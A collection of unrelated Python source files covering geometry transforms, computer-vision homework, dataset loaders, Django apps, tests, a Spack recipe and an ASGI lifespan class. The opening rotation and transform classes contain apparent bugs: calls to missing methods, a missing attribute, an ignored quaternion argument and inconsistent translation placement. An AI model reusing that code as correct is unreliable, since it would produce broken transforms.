def identity():
return RotationMatrix(np.eye(3))
@staticmethod
def axis_rotation(angle, axis, point=None):
return RotationMatrix(transformations.rotation_matrix(angle, axis, point)[:3, :3])
@staticmethod
def x_rotation(angle):
return RotationMatrix.axis_rotation(angle, axis=[1, 0, 0])
@staticmethod
def y_rotation(angle):
return RotationMatrix.axis_rotation(angle, axis=[0, 1, 0])
@staticmethod
def z_rotation(angle):
return RotationMatrix.axis_rotation(angle, axis=[0, 0, 1])
def __init__(self, mat, copy=False):
if copy:
mat = np.copy(mat)
assert mat.shape == (3, 3)
self._mat = mat
def apply_to(self, rotation):
return RotationMatrix(np.dot(self._mat, rotation.get_matrix(copy=False)))
def apply_to_vector(self, vec):
assert len(vec) == 3
return np.dot(self._mat, vec)
def get_inverse(self):
return RotationMatrix(np.linalg.inv(self._mat))
def invert(self):
self._mat = np.linalg.inv(self._mat)
def get_transpose(self):
return RotationMatrix(np.transpose(self._mat))
def transpose(self):
self._mat = np.transpose(self._mat)
def get_matrix(self, copy=True):
if copy:
return np.copy(self._mat)
else:
return self._mat
@property
def matrix(self):
return self.get_matrix()
def get_quaternion(self, copy=True):
return transformations.quaternion_from_matrix(self._mat)
@property
def quaternion(self):
return self.get_quaternion()
class Rotation(object):
"""A rotation represented by a quaternion (qx, qy, qz, qw)"""
@staticmethod
def identity():
return Rotation(np.array([0, 0, 0, 1]))
@staticmethod
def axis_rotation(angle, axis, point=None):
return Rotation(RotationMatrix.axis_rotation(angle, axis, point).quaternion)
@staticmethod
def x_rotation(angle):
return Rotation(RotationMatrix.x_rotation(angle).quaternion)
@staticmethod
def y_rotation(angle):
return Rotation(RotationMatrix.y_rotation(angle).quaternion)
@staticmethod
def z_rotation(angle):
return Rotation(RotationMatrix.z_rotation(angle).quaternion)
def __init__(self, quaternion, copy=False):
if copy:
quaternion = np.copy(quaternion)
self._quaternion = quaternion
def apply_to(self, rotation):
return Rotation(math_utils.multiply_quaternion(self._quaternion, rotation.quaternion))
def apply_to_quat(self, quat):
assert len(quat) == 4
return math_utils.multiply_quaternion(self._quaternion, quat)
def apply_to_vector(self, vec):
assert len(vec) == 3
return math_utils.rotate_vector_with_quaternion(self._quaternion, vec)
def get_inverse(self):
return Rotation(math_utils.invert_quaternion(self._quaternion))
def invert(self):
self._quaternion = math_utils.invert_quaternion(self._quaternion)
def get_quaternion(self, copy=True):
if copy:
return np.copy(self._quaternion)
else:
return self._quaternion
@property
def quaternion(self):
return self.get_quaternion()
def get_matrix(self, copy=True):
return transformations.quaternion_matrix(self._quaternion)[:3, :3]
@property
def matrix(self):
return self.get_matrix()
class Transform(object):
"""A rigid transformation represented by a translation vector and rotation quaternion"""
@staticmethod
def from_transformation_matrix(transformation_mat):
transformation_mat = np.asarray(transformation_mat)
transform = TransformMatrix(transformation_mat)
return Transform(transform.translation, transform.quaternion)
@staticmethod
def from_translation_rotation_matrix(translation, rotation_mat):
translation = np.asarray(translation)
rotation_mat = np.asarray(rotation_mat)
quat = RotationMatrix(rotation_mat).quaternion
return Transform(translation, quat)
@staticmethod
def from_translation_quaternion(translation, quat):
translation = np.asarray(translation)
quat = np.asarray(quat)
return Transform(translation, quat)
@staticmethod
def from_translation(translation):
translation = np.asarray(translation)
quat = Rotation.identity().quaternion
return Transform(translation, quat)
@staticmethod
def from_rotation_matrix(rotation_mat):
rotation_mat = np.asarray(rotation_mat)
translation = np.zeros((3,), dtype=rotation_mat.dtype)
quat = RotationMatrix(rotation_mat).quaternion
return Transform(translation, quat)
@staticmethod
def from_quaternion(quat):
quat = np.asarray(quat)
translation = np.zeros((3,), dtype=quat.dtype)
quat = Rotation.identity().quaternion
return Transform(translation, quat)
@staticmethod
def from_axis_rotation(angle, axis, point=None):
return Transform.from_transformation_matrix(TransformMatrix.from_axis_rotation(angle, axis, point).matrix)
@staticmethod
def from_x_rotation(angle):
return Transform.axis_rotation(angle, axis=[1, 0, 0])
@staticmethod
def from_y_rotation(angle):
return Transform.axis_rotation(angle, axis=[0, 1, 0])
@staticmethod
def from_z_rotation(angle):
return Transform.axis_rotation(angle, axis=[0, 0, 1])
@staticmethod
def identity(dtype=np.float):
return Transform(np.array([0, 0, 0], dtype=dtype), np.array([0, 0, 0, 1], dtype=dtype))
def __init__(self, translation, quaternion, copy=False):
if copy:
translation = np.copy(translation)
quaternion = np.copy(quaternion)
self._translation = translation
self._quaternion = quaternion
def get_inverse(self):
inverse_trans = Transform(self.translation, self.quaternion)
inverse_trans.invert()
return inverse_trans
def invert(self):
self._quaternion = math_utils.invert_quaternion(self._quaternion)
self._translation = - math_utils.rotate_vector_with_quaternion(self._quaternion, self._translation)
def apply_to(self, transform):
assert isinstance(transform, Transform)
new_quaternion = math_utils.multiply_quaternion(self._quaternion, transform.get_quaternion(copy=False))
new_translation = self.apply_to_vector(transform.get_translation(copy=False)) + self._translation
return Transform(new_translation, new_quaternion)
def apply_to_vector(self, vec):
assert len(vec) == 3
return math_utils.rotate_vector_with_quaternion(self._quaternion, vec)
def get_translation(self, copy=True):
if copy:
return np.copy(self._transformation_mat[3, :3])
else:
return self._transformation_mat[3, :3]
@property
def translation(self):
return self.get_translation()
def get_rotation_matrix(self, copy=True):
return Rotation(self._quaternion).matrix
@property
def rotation_matrix(self):
return self.get_rotation_matrix()
def get_quaternion(self, copy=True):
if copy:
return np.copy(self._quaternion)
else:
return self._quaternion
@property
def quaternion(self):
return self.get_quaternion()
def get_matrix(self, copy=True):
transform_mat = np.eye(4, dtype=self._translation.dtype)
transform_mat[:3, :3] = Rotation(self._quaternion).matrix
transform_mat[3, :3] = self._translation
return transform_mat
@property
def matrix(self):
return self.get_matrix()
class TransformMatrix(object):
"""A rigid transformation represented by a 4x4 matrix"""
@staticmethod
def from_translation_rotation_matrix(translation, rotation_mat):
translation = np.asarray(translation)
rotation_mat = np.asarray(rotation_mat)
transformation_mat = np.eye(4, dtype=translation.dtype)
transformation_mat[:3, 3] = translation
transformation_mat[:3, :3] = rotation_mat
return TransformMatrix(transformation_mat)
@staticmethod
def from_translation_quaternion(translation, quat):
translation = np.asarray(translation)
quat = np.asarray(quat)
transformation_mat = np.eye(4, dtype=translation.dtype)
transformation_mat[:3, 3] = translation
transformation_mat[:3, :3] = Rotation(quat).matrix
return TransformMatrix(transformation_mat)
@staticmethod
def from_translation(translation):
translation = np.asarray(translation)
transformation_mat = np.eye(4, dtype=translation.dtype)
transformation_mat[:3, 3] = translation
return TransformMatrix(transformation_mat)
@staticmethod
def from_rotation_matrix(rotation_mat):
rotation_mat = np.asarray(rotation_mat)
transformation_mat = np.eye(4, dtype=rotation_mat.dtype)
transformation_mat[:3, :3] = rotation_mat
return TransformMatrix(transformation_mat)
@staticmethod
def from_quaternion(quat):
quat = np.asarray(quat)
transformation_mat = np.eye(4, dtype=quat.dtype)
transformation_mat[:3, :3] = Rotation(quat).matrix
return TransformMatrix(transformation_mat)
@staticmethod
def from_axis_rotation(angle, axis, point=None):
transformation_mat = transformations.rotation_matrix(angle, axis, point)
return TransformMatrix(transformation_mat)
@staticmethod
def from_x_rotation(angle):
return TransformMatrix.axis_rotation(angle, axis=[1, 0, 0])
@staticmethod
def from_y_rotation(angle):
return TransformMatrix.axis_rotation(angle, axis=[0, 1, 0])
@staticmethod
def from_z_rotation(angle):
return TransformMatrix.axis_rotation(angle, axis=[0, 0, 1])
@staticmethod
def identity(dtype=np.float):
return TransformMatrix(np.eye(4), dtype=dtype)
def __init__(self, transformation_mat, copy=False):
if copy:
transformation_mat = np.copy(transformation_mat)
self._transformation_mat = transformation_mat
def get_inverse(self):
inverse_trans = TransformMatrix(self._transformation_mat)
inverse_trans.invert()
return inverse_trans
def invert(self):
self._transformation_mat = math_utils.invert_matrix(self._transformation_mat)
def apply_to(self, transform):
assert isinstance(transform, TransformMatrix)
new_transformation_mat = np.dot(self._transformation_mat, transform.get_matrix(copy=False))
return TransformMatrix(new_transformation_mat)
def apply_to_vector(self, vec):
if len(vec) == 3:
new_vec = np.dot(self._transformation_mat[:3, :3], vec)
new_vec += self._transformation_mat[3, :3]
elif len(vec) == 4:
new_vec = np.dot(self._transformation_mat, vec)
else:
raise ValueError("Vector has to be length 3 or 4")
return new_vec
def get_translation(self, copy=True):
if copy:
return np.copy(self._transformation_mat[3, :3])
else:
return self._transformation_mat[3, :3]
@property
def translation(self):
return self.get_translation()
def get_rotation_matrix(self, copy=True):
if copy:
return np.copy(self._transformation_mat[:3, :3])
else:
return self._transformation_mat[:3, :3]
@property
def rotation_matrix(self):
return self.get_rotation_matrix()
def get_quaternion(self, copy=True):
return RotationMatrix(self._transformation_mat).quaternion
@property
def quaternion(self):
return self.get_quaternion()
def get_matrix(self, copy=True):
if copy:
return np.copy(self._transformation_mat)
else:
return self._transformation_mat
@property
def matrix(self):
return self.get_matrix()
|
import os
import numpy as np
import json
from PIL import Image
from model import *
kernels = buildKernels()
def detect_red_light(I):
'''
This function takes a numpy array <I> and returns a list <bounding_boxes>.
The list <bounding_boxes> should have one element for each red light in the
image. Each element of <bounding_boxes> should itself be a list, containing
four integers that specify a bounding box: the row and column index of the
top left corner and the row and column index of the bottom right corner (in
that order). See the code below for an example.
Note that PIL loads images in RGB order, so:
I[:,:,0] is the red channel
I[:,:,1] is the green channel
I[:,:,2] is the blue channel
'''
bounding_boxes = [] # This should be a list of lists, each of length 4. See format example below.
'''
BEGIN YOUR CODE
'''
bounding_boxes = detect_red_lights(I, kernels, .95)
'''
END YOUR CODE
'''
for i in range(len(bounding_boxes)):
assert len(bounding_boxes[i]) == 4
return bounding_boxes
# set the path to the downloaded data:
data_path = '../data/RedLights2011_Medium'
# set a path for saving predictions:
preds_path = '../data/hw01_preds'
os.makedirs(preds_path,exist_ok=True) # create directory if needed
# get sorted list of files:
file_names = sorted(os.listdir(data_path))
# remove any non-JPEG files:
file_names = [f for f in file_names if '.jpg' in f]
preds = {}
for i in range(len(file_names)):
# read image using PIL:
I = Image.open(os.path.join(data_path,file_names[i]))
# convert to numpy array:
I = np.asarray(I)
preds[file_names[i]] = detect_red_light(I)
# save preds (overwrites any previous predictions!)
with open(os.path.join(preds_path,'preds.json'),'w') as f:
json.dump(preds,f)
|
import warnings
from functools import partial
from typing import Any, List, Optional, Type, Union
from ...models.resnet import BasicBlock, Bottleneck, ResNet
from ..transforms.presets import ImageNetEval
from ._api import Weights, WeightEntry
from ._meta import _IMAGENET_CATEGORIES
__all__ = ["ResNet", "ResNet50Weights", "resnet50"]
def _resnet(
block: Type[Union[BasicBlock, Bottleneck]],
layers: List[int],
weights: Optional[Weights],
progress: bool,
**kwargs: Any,
) -> ResNet:
if weights is not None:
kwargs["num_classes"] = len(weights.meta["categories"])
model = ResNet(block, layers, **kwargs)
if weights is not None:
model.load_state_dict(weights.state_dict(progress=progress))
return model
_common_meta = {
"size": (224, 224),
"categories": _IMAGENET_CATEGORIES,
}
class ResNet50Weights(Weights):
ImageNet1K_RefV1 = WeightEntry(
url="https://download.pytorch.org/models/resnet50-0676ba61.pth",
transforms=partial(ImageNetEval, crop_size=224),
meta={
**_common_meta,
"recipe": "https://github.com/pytorch/vision/tree/main/references/classification",
"acc@1": 76.130,
"acc@5": 92.862,
},
)
ImageNet1K_RefV2 = WeightEntry(
url="https://download.pytorch.org/models/resnet50-tmp.pth",
transforms=partial(ImageNetEval, crop_size=224),
meta={
**_common_meta,
"recipe": "https://github.com/pytorch/vision/issues/3995",
"acc@1": 80.352,
"acc@5": 95.148,
},
)
def resnet50(weights: Optional[ResNet50Weights] = None, progress: bool = True, **kwargs: Any) -> ResNet:
if "pretrained" in kwargs:
warnings.warn("The argument pretrained is deprecated, please use weights instead.")
weights = ResNet50Weights.ImageNet1K_RefV1 if kwargs.pop("pretrained") else None
weights = ResNet50Weights.verify(weights)
return _resnet(Bottleneck, [3, 4, 6, 3], weights, progress, **kwargs)
|
import os
import gzip
import torch
from torch.utils.data import Dataset
import numpy as np
import cv2
from .utils import IMAGE_CHANNELS, IMAGE_HEIGHT, IMAGE_WIDTH, cache_path, ImageDataset, one_hot, file_md5, download_file
from vaetc.utils import debug_print
from struct import unpack
def read_binary_matrix(file_path: str) -> np.ndarray:
SINGLE_PRECISION_MATRIX = 0x1E3D4C51
PACKED_MATRIX = 0x1E3D4C52
DOUBLE_PRECISION_MATRIX = 0x1E3D4C53
INTEGER_MATRIX = 0x1E3D4C54
BYTE_MATRIX = 0x1E3D4C55
SHORT_MATRIX = 0x1E3D4C56
with open(file_path, "rb") as fp:
magic = unpack("<i", fp.read(4))[0]
ndim = unpack("<i", fp.read(4))[0]
dim = tuple(unpack("<i", fp.read(4))[0] for _ in range(max(3, ndim)))[:ndim]
debug_print(ndim, dim)
if magic == INTEGER_MATRIX:
data = np.frombuffer(fp.read(), dtype=np.dtype(np.int32).newbyteorder("<")).reshape(dim)
elif magic == BYTE_MATRIX:
data = np.frombuffer(fp.read(), dtype=np.uint8).reshape(dim)
else:
raise NotImplementedError(f"magic 0x{magic:X}")
return data
class SmallNORB(Dataset):
""" THE small NORB DATASET, V1.0 [huang and LeCun, 2005]
(https://cs.nyu.edu/~ylclab/data/norb-v1.0-small/)
Returns:
ImageDataset
"""
def __init__(self, root, download=False, split="train") -> None:
self.root = root
if self._file_exists():
debug_print(f"File already downloaded at {self.root}")
else:
debug_print(f"File not downloaded yet at {self.root}")
if not download:
raise RuntimeError(f"Dataset not found in {self.root}")
self._download()
self._check_integrity()
if split == "train":
self.dat = read_binary_matrix(os.path.join(self.root, "smallnorb-5x46789x9x18x6x2x96x96-training-dat.mat"))
self.cat = read_binary_matrix(os.path.join(self.root, "smallnorb-5x46789x9x18x6x2x96x96-training-cat.mat"))
self.info = read_binary_matrix(os.path.join(self.root, "smallnorb-5x46789x9x18x6x2x96x96-training-info.mat"))
elif split == "test":
self.dat = read_binary_matrix(os.path.join(self.root, "smallnorb-5x01235x9x18x6x2x96x96-testing-dat.mat"))
self.cat = read_binary_matrix(os.path.join(self.root, "smallnorb-5x01235x9x18x6x2x96x96-testing-cat.mat"))
self.info = read_binary_matrix(os.path.join(self.root, "smallnorb-5x01235x9x18x6x2x96x96-testing-info.mat"))
else:
raise RuntimeError(f"Invalid split {split}")
def __len__(self) -> int:
return self.dat.shape[0]
def __getitem__(self, index):
if torch.is_tensor(index):
index = index.item()
x = self.dat[index].astype(np.float32) / 255
x = x[0] # use only the first camera
x = cv2.resize(x, (IMAGE_WIDTH, IMAGE_HEIGHT), interpolation=cv2.INTER_LINEAR)
x = np.tile(x[None,...], [IMAGE_CHANNELS, 1, 1])
cat = one_hot(self.cat[index], num_classes=5)
info = np.array([
self.info[index,1].astype(float) / 8, # elevation
self.info[index,2].astype(float) / 34, # azimuth
self.info[index,3].astype(float) / 5, # lighting condition
])
t = np.concatenate([cat, info], axis=0).astype(np.float32)
return torch.tensor(x), torch.tensor(t)
def _file_exists(self):
files = (
"smallnorb-5x01235x9x18x6x2x96x96-testing-cat.mat",
"smallnorb-5x01235x9x18x6x2x96x96-testing-dat.mat",
"smallnorb-5x01235x9x18x6x2x96x96-testing-info.mat",
"smallnorb-5x46789x9x18x6x2x96x96-training-cat.mat",
"smallnorb-5x46789x9x18x6x2x96x96-training-dat.mat",
"smallnorb-5x46789x9x18x6x2x96x96-training-info.mat",
)
for name in files:
if not os.path.isfile(os.path.join(self.root, name)):
return False
return True
def _download(self):
if os.path.exists(self.root):
raise RuntimeError(f"Already exists: {self.root}")
urls = (
"https://cs.nyu.edu/~ylclab/data/norb-v1.0-small/smallnorb-5x01235x9x18x6x2x96x96-testing-cat.mat.gz",
"https://cs.nyu.edu/~ylclab/data/norb-v1.0-small/smallnorb-5x01235x9x18x6x2x96x96-testing-dat.mat.gz",
"https://cs.nyu.edu/~ylclab/data/norb-v1.0-small/smallnorb-5x01235x9x18x6x2x96x96-testing-info.mat.gz",
"https://cs.nyu.edu/~ylclab/data/norb-v1.0-small/smallnorb-5x46789x9x18x6x2x96x96-training-cat.mat.gz",
"https://cs.nyu.edu/~ylclab/data/norb-v1.0-small/smallnorb-5x46789x9x18x6x2x96x96-training-dat.mat.gz",
"https://cs.nyu.edu/~ylclab/data/norb-v1.0-small/smallnorb-5x46789x9x18x6x2x96x96-training-info.mat.gz",
)
for url in urls:
name = url.split("/")[-1]
gz_path = os.path.join(self.root, name)
mat_path = gz_path[:-3]
download_file(url, gz_path, make_dirs=True)
debug_print(f"decompressing {gz_path} ...")
with gzip.open(gz_path, "rb") as fp_gz:
with open(mat_path, "wb") as fp_mat:
while True:
chunk = fp_gz.read(4096)
if len(chunk) == 0: break
fp_mat.write(chunk)
fp_mat.flush()
def _check_integrity(self) -> bool:
if not self._file_exists():
raise RuntimeError(f"File not found in {self.root}")
def smallnorb(download=True):
path_to_dataset = cache_path("smallnorb")
training_set = SmallNORB(root=path_to_dataset, download=download, split="train")
test_set = SmallNORB(root=path_to_dataset, download=download, split="test")
return ImageDataset(training_set, test_set)
|
from django.db import models
from Category.models import Category
class City(models.Model):
name = models.CharField(max_length=20, unique=True)
categories = models.ManyToManyField(Category)
def __str__(self):
return self.name
# class Area(models.Model):
# name = models.CharField(max_length=20)
# City = models.ForeignKey(City,on_delete=models.CASCADE)
# def __str__(self):
# return self.name
|
"""
dlam trying to make this old 'shorturls' package compatible with 2.0!
"""
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
try:
from importlib import import_module
except:
from django.utils.importlib import import_module
from shorturls import baseconv
default_converter = baseconv.base62
if hasattr(settings, 'SHORTURLS_DEFAULT_CONVERTER'):
mod_name, conv_name = settings.SHORTURLS_DEFAULT_CONVERTER.rsplit('.', 1)
try:
mod = import_module(mod_name)
except ImportError as e:
raise ImproperlyConfigured(
'Could not load converter specified by SHORTURLS_DEFAULT_CONVERTER. Error was: {0!s}'.format(e))
try:
default_converter = getattr(mod, conv_name)
except AttributeError:
raise ImproperlyConfigured(
'Could not load converter specified by SHORTURLS_DEFAULT_CONVERTER. {0!s} is not in {1!s}.'.format(conv_name, mod))
|
from thenewboston_node.business_logic.models import (
NodeDeclarationSignedChangeRequestMessage, SignedChangeRequestMessage
)
def test_can_deserialize_from_base_class():
instance = SignedChangeRequestMessage.deserialize_from_dict({
'signed_change_request_type': 'nd',
'node': {
'network_addresses': ['00ee'],
'fee_amount': 3,
'identifier': '00aa'
}
})
assert isinstance(instance, NodeDeclarationSignedChangeRequestMessage)
assert instance.signed_change_request_type == 'nd'
assert instance.node.network_addresses == ['00ee']
assert instance.node.fee_amount == 3
assert instance.node.identifier == '00aa'
def test_can_deserialize_from_child_class_with_signed_change_request_type():
instance = NodeDeclarationSignedChangeRequestMessage.deserialize_from_dict({
'signed_change_request_type': 'nd',
'node': {
'network_addresses': ['00ee'],
'fee_amount': 3,
'identifier': '00aa'
}
})
assert isinstance(instance, NodeDeclarationSignedChangeRequestMessage)
assert instance.signed_change_request_type == 'nd'
assert instance.node.network_addresses == ['00ee']
assert instance.node.fee_amount == 3
assert instance.node.identifier == '00aa'
def test_can_deserialize_from_child_class_without_signed_change_request_type():
instance = NodeDeclarationSignedChangeRequestMessage.deserialize_from_dict({
'node': {
'network_addresses': ['00ee'],
'fee_amount': 3,
'identifier': '00aa'
}
})
assert isinstance(instance, NodeDeclarationSignedChangeRequestMessage)
assert instance.signed_change_request_type == 'nd'
assert instance.node.network_addresses == ['00ee']
assert instance.node.fee_amount == 3
assert instance.node.identifier == '00aa'
|
import random
# TODO: Get this outta here!
spinner_choice = random.choice(['aesthetic', 'arc', 'arrow3', 'betaWave', 'balloon',
'bounce', 'bouncingBar', 'circle', 'dots', 'line', 'squish', 'toggle10', 'pong'])
# TODO: Replace these removed soundtracks
soundtrack_files = [
"talc_soundtrack.mp3",
"talc_soundtrack2.mp3",
"talc_soundtrack3.mp3",
"talc_soundtrack4.mp3",
# "talc_soundtrack5.mp3",
]
prog = "TALC"
author = "Tyler Weston"
# version = '0.0.5'
size = 1280, 720
USE_PROMPTS = False
USE_OPENAI = False
DETECT_FACES = True
# noise_glitching = False
NUM_SMMRY_SENTENCES = 8
MINIMUM_ARTICLE_LENGTH = 10000
# GLITCH_VIDEOS = False
# GLITCH_VIDEOS_PERCENT = 0.3
USE_MOVIEPY_VIDEO_FX = True
MOVIEPY_VIDEO_FX_PERCENT = 0.8
DEFAULT_IMAGES_PER_SEARCH = 3
CLEANUP_ON_FINISH = True
|
from lime.lime_image import *
import pandas as pd
import yaml
import os
import datetime
import dill
import cv2
import numpy as np
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from src.visualization.visualize import visualize_explanation
from src.predict import predict_instance, predict_and_explain
from src.data.preprocess import remove_text
def setup_lime():
'''
Load relevant information and create a LIME Explainer
:return: dict containing important information and objects for explanation experiments
'''
# Load relevant constants from project config file
cfg = yaml.full_load(open(os.getcwd() + "/config.yml", 'r'))
lime_dict = {}
lime_dict['NUM_SAMPLES'] = cfg['LIME']['NUM_SAMPLES']
lime_dict['NUM_FEATURES'] = cfg['LIME']['NUM_FEATURES']
lime_dict['IMG_PATH'] = cfg['PATHS']['IMAGES']
lime_dict['RAW_DATA_PATH'] = cfg['PATHS']['RAW_DATA']
lime_dict['IMG_DIM'] = cfg['DATA']['IMG_DIM']
lime_dict['PRED_THRESHOLD'] = cfg['PREDICTION']['THRESHOLD']
lime_dict['CLASSES'] = cfg['DATA']['CLASSES']
lime_dict['CLASS_MODE'] = cfg['TRAIN']['CLASS_MODE']
lime_dict['COVID_ONLY'] = cfg['LIME']['COVID_ONLY']
KERNEL_WIDTH = cfg['LIME']['KERNEL_WIDTH']
FEATURE_SELECTION = cfg['LIME']['FEATURE_SELECTION']
# Load train and test sets
lime_dict['TRAIN_SET'] = pd.read_csv(cfg['PATHS']['TRAIN_SET'])
lime_dict['TEST_SET'] = pd.read_csv(cfg['PATHS']['TEST_SET'])
# Create ImageDataGenerator for test set
test_img_gen = ImageDataGenerator(preprocessing_function=remove_text,
samplewise_std_normalization=True, samplewise_center=True)
test_generator = test_img_gen.flow_from_dataframe(dataframe=lime_dict['TEST_SET'], directory=cfg['PATHS']['RAW_DATA'],
x_col="filename", y_col='label_str', target_size=tuple(cfg['DATA']['IMG_DIM']), batch_size=1,
class_mode='categorical', validate_filenames=False, shuffle=False)
lime_dict['TEST_GENERATOR'] = test_generator
# Define the LIME explainer
lime_dict['EXPLAINER'] = LimeImageExplainer(kernel_width=KERNEL_WIDTH, feature_selection=FEATURE_SELECTION,
verbose=True)
dill.dump(lime_dict['EXPLAINER'], open(cfg['PATHS']['LIME_EXPLAINER'], 'wb')) # Serialize the explainer
# Load trained model's weights
lime_dict['MODEL'] = load_model(cfg['PATHS']['MODEL_TO_LOAD'], compile=False)
return lime_dict
def explain_xray(lime_dict, idx, save_exp=True):
'''
Make a prediction and provide a LIME explanation
:param lime_dict: dict containing important information and objects for explanation experiments
:param idx: index of image in test set to explain
:param save_exp: Boolean indicating whether to save the explanation visualization
'''
# Get i'th preprocessed image in test set
lime_dict['TEST_GENERATOR'].reset()
for i in range(idx + 1):
x, y = lime_dict['TEST_GENERATOR'].next()
x = np.squeeze(x, axis=0)
# Get the corresponding original image (no preprocessing)
orig_img = cv2.imread(lime_dict['RAW_DATA_PATH'] + lime_dict['TEST_SET']['filename'][idx])
new_dim = tuple(lime_dict['IMG_DIM'])
orig_img = cv2.resize(orig_img, new_dim, interpolation=cv2.INTER_NEAREST) # Resize image
# Make a prediction for this image and retrieve a LIME explanation for the prediction
start_time = datetime.datetime.now()
explanation, probs = predict_and_explain(x, lime_dict['MODEL'], lime_dict['EXPLAINER'],
lime_dict['NUM_FEATURES'], lime_dict['NUM_SAMPLES'])
print("Explanation time = " + str((datetime.datetime.now() - start_time).total_seconds()) + " seconds")
# Get image filename and label
img_filename = lime_dict['TEST_SET']['filename'][idx]
label = lime_dict['TEST_SET']['label'][idx]
# Rearrange prediction probability vector to reflect original ordering of classes in project config
probs = [probs[0][lime_dict['CLASSES'].index(c)] for c in lime_dict['TEST_GENERATOR'].class_indices]
# Visualize the LIME explanation and optionally save it to disk
if save_exp:
file_path = lime_dict['IMG_PATH']
else:
file_path = None
if lime_dict['COVID_ONLY'] == True:
label_to_see = lime_dict['TEST_GENERATOR'].class_indices['COVID-19']
else:
label_to_see = 'top'
_ = visualize_explanation(orig_img, explanation, img_filename, label, probs, lime_dict['CLASSES'], label_to_see=label_to_see,
dir_path=file_path)
return
if __name__ == '__main__':
lime_dict = setup_lime()
i = 0 # Select i'th image in test set
explain_xray(lime_dict, i, save_exp=True) # Generate explanation for image
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack.package import *
class Libslirp(MesonPackage):
"""General purpose TCP-IP emulator"""
homepage = 'https://gitlab.freedesktop.org/slirp/libslirp'
url = 'https://gitlab.freedesktop.org/slirp/libslirp/-/archive/v4.6.1/libslirp-v4.6.1.tar.gz'
maintainers = ['bernhardkaindl']
version('4.6.1', sha256='69ad4df0123742a29cc783b35de34771ed74d085482470df6313b6abeb799b11')
depends_on('pkgconfig', type='build')
depends_on('glib')
|
from libya_elections.admin_models import LibyaAdminModel
from libya_elections.admin_site import admin_site
from .models import Subscription
class SubscriptionAdmin(LibyaAdminModel):
list_display = ['__str__', 'get_subscription_type_display']
list_filter = ['subscription_type']
raw_id_fields = ['user']
admin_site.register(Subscription, SubscriptionAdmin)
|
"""The expected interface for all learner implementations."""
from abc import ABC, abstractmethod
from typing import Any, Sequence, Dict, Union, Tuple, Optional
from coba.simulations import Context, Action, Key
class Learner(ABC):
"""The interface for Learner implementations."""
@property
@abstractmethod
def family(self) -> str:
"""The family of the learner.
This value is used for descriptive purposes only when creating benchmark results.
"""
...
@property
@abstractmethod
def params(self) -> Dict[str,Any]:
"""The parameters used to initialize the learner.
This value is used for descriptive purposes only when creating benchmark results.
"""
...
@abstractmethod
def predict(self, key: Key, context: Context, actions: Sequence[Action]) -> Sequence[float]:
"""Determine a PMF with which to select the given actions.
Args:
key: A unique identifier for the interaction that the observed reward
came from. This identifier allows learners to share information
between the choose and learn methods while still keeping the overall
learner interface consistent and clean.
context: The current context. This argument will be None when playing
a multi-armed bandit simulation and will contain context features
when playing a contextual bandit simulation. Context features could
be an individual number (e.g. 1.34), a string (e.g., "hot"), or a
tuple of strings and numbers (e.g., (1.34, "hot")) depending on the
simulation being played.
actions: The current set of actions to choose from in the given context.
Action sets can be lists of numbers (e.g., [1,2,3,4]), a list of
strings (e.g. ["high", "medium", "low"]), or a list of tuples such
as in the case of movie recommendations (e.g., [("action", "oscar"),
("fantasy", "razzie")]).
Returns:
A sequence of probabilities indicating the probability of taking each action.
"""
...
@abstractmethod
def learn(self, key: Key, context: Context, action: Action, reward: float, probability: float) -> Optional[Dict[str,Any]]:
"""Learn about the result of an action that was taken in a context.
Args:
key: A unique identifier for the interaction that the observed reward
came from. This identifier allows learners to share information
between the choose and learn methods while still keeping the overall
learner interface consistent and clean.
context: The current context. This argument will be None when playing
a multi-armed bandit simulation and will contain context features
when playing a contextual bandit simulation. Context features could
be an individual number (e.g. 1.34), a string (e.g., "hot"), or a
tuple of strings and numbers (e.g., (1.34, "hot")) depending on the
simulation being played.
action: The action that was selected to play and observe its reward.
An Action can be an individual number (e.g., 2), a string (e.g.
"medium"), or a list of some combination of numbers or strings
(e.g., ["action", "oscar"]).
reward: The reward received for taking the given action in the given context.
probability: The probability with wich the given action was selected.
"""
...
def __reduce__(self) -> Union[str, Tuple[Any, ...]]:
"""An optional method that can be overridden for Learner implimentations that are not picklable by default."""
return super().__reduce__()
|
try:
from unittest import mock
except ImportError:
import mock
from rest_framework import status
from rest_framework.reverse import reverse
url = reverse("rest-email-auth:password-reset")
@mock.patch(
"rest_email_auth.views.serializers.PasswordResetSerializer.save",
autospec=True,
)
def test_request_reset(mock_save, api_client, password_reset_token_factory):
"""
Sending a POST request with valid data to the view should reset the
user's password.
"""
token = password_reset_token_factory()
data = {"key": token.key, "password": "new_passw0rd"}
response = api_client.post(url, data)
assert response.status_code == status.HTTP_200_OK
assert mock_save.call_count == 1
|
from .capeval.cider import Cider
|
import asyncio
import logging
import types
import typing
import enum
from dataclasses import dataclass
from ..types import ASGIApp, Message
from ..exceptions import LifespanUnsupported, LifespanFailure, UnexpectedMessage
class LifespanCycleState(enum.Enum):
"""
The state of the ASGI `lifespan` connection.
* **CONNECTING** - Initial state. The ASGI application instance will be run with
the connection scope containing the `lifespan` type.
* **STARTUP** - The lifespan startup event has been pushed to the queue to be
received by the application.
* **SHUTDOWN** - The lifespan shutdown event has been pushed to the queue to be
received by the application.
* **FAILED** - A lifespan failure has been detected, and the connection will be
closed with an error.
* **UNSUPPORTED** - An application attempted to send a message before receiving
the lifepan startup event. If the lifespan argument is "on", then the connection
will be closed with an error.
"""
CONNECTING = enum.auto()
STARTUP = enum.auto()
SHUTDOWN = enum.auto()
FAILED = enum.auto()
UNSUPPORTED = enum.auto()
@dataclass
class LifespanCycle:
"""
Manages the application cycle for an ASGI `lifespan` connection.
* **app** - An asynchronous callable that conforms to version 3.0 of the ASGI
specification. This will usually be an ASGI framework application instance.
* **lifespan** - A string to configure lifespan support. Choices are `auto`, `on`,
and `off`. Default is `auto`.
* **state** - An enumerated `LifespanCycleState` type that indicates the state of
the ASGI connection.
* **exception** - An exception raised while handling the ASGI event.
* **app_queue** - An asyncio queue (FIFO) containing messages to be received by the
application.
* **startup_event** - An asyncio event object used to control the application
startup flow.
* **shutdown_event** - An asyncio event object used to control the application
shutdown flow.
* **exception** - An exception raised while handling the ASGI event. This may or
may not be raised depending on the state.
"""
app: ASGIApp
lifespan: str
state: LifespanCycleState = LifespanCycleState.CONNECTING
